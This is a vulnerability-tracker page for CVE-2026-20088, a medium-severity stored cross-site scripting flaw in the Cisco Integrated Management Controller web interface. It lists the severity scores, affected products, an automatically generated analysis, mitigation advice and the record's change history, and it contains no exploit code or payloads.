Description
A vulnerability in the web-based management interface of Cisco IMC could allow an authenticated, remote attacker with administrative privileges to conduct a stored XSS attack against a user of the interface.

This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the browser of the targeted user or access sensitive, browser-based information.
Published: 2026-04-01
Score: 4.8 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored cross‑site scripting that allows an authenticated attacker to execute arbitrary JavaScript in the browser of an impact user.
Action: Apply Patch
AI Analysis

Impact

A stored cross‑site scripting vulnerability is present in the web‑based management interface of Cisco Integrated Management Controller. An administrator‑privileged attacker who has authenticated access can inject script code that is later retrieved and executed when a victim of the interface clicks a crafted link. This attack can run arbitrary code in the victim’s browser and expose sensitive, browser‑based information. The weakness is a classic improper validation of user input identified as CWE‑79.

Affected Systems

The affected products are Cisco Enterprise NFV Infrastructure Software, Cisco Unified Computing System (Standalone), and Cisco Unified Computing System E‑Series Software (UCSE). Version details are not provided in the advisory, so users should consult the vendor documentation or the provided Cisco advisory to determine the specific firmware or software releases that contain this flaw.

Risk and Exploitability

The CVSS score of 4.8 reflects a moderate impact, with the attack requiring remote authenticated administrative privileges and the successful exploitation depending on a victim clicking a malicious link. The lack of an EPSS score and absence from the KEV catalog suggest that exploit evidence is not publicly reported. Nonetheless, because the flaw permits arbitrary script execution, it poses a moderate risk, particularly in environments where privileged users access the interface using untrusted browsers or internet‑exposed connections.

Generated by OpenCVE AI on April 2, 2026 at 02:42 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Check the Cisco advisory at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cimc-xss-A2tkgVAB for the latest patch or upgrade guidance.
  • Apply the vendor‑provided patch or upgrade to a firmware/software version that eliminates the stored XSS flaw.
  • If a patch is not yet available, limit administrative access to trusted personnel and enforce strong authentication controls.
  • Configure web browsers used to access the interface to disable or restrict JavaScript execution, and apply inline‑script blocking policies such as Content Security Policy (CSP).

Generated by OpenCVE AI on April 2, 2026 at 02:42 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 03 Apr 2026 10:15:00 +0000

Type Values Removed Values Added
First Time appeared Cisco
Cisco enterprise Nfv Infrastructure Software
Cisco unified Computing System
Cisco unified Computing System Software
Vendors & Products Cisco
Cisco enterprise Nfv Infrastructure Software
Cisco unified Computing System
Cisco unified Computing System Software

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description A vulnerability in the web-based management interface of Cisco IMC could allow an authenticated, remote attacker with administrative privileges to conduct a stored XSS attack against a user of the interface. This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the browser of the targeted user or access sensitive, browser-based information.
Title Cisco Integrated Management Controller Cross-Site Scripting Vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 4.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Subscriptions

Cisco Enterprise Nfv Infrastructure Software Unified Computing System Unified Computing System Software
cve-icon MITRE

Status: PUBLISHED

Assigner: cisco

Published:

Updated: 2026-04-22T19:10:02.232Z

Reserved: 2025-10-08T11:59:15.367Z

Link: CVE-2026-20088

cve-icon Vulnrichment

Updated: 2026-04-01T17:55:15.299Z

cve-icon NVD

Status : Awaiting Analysis

Published: 2026-04-01T17:28:27.457

Modified: 2026-04-03T16:11:11.357

Link: CVE-2026-20088

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-03T08:58:25Z

Weaknesses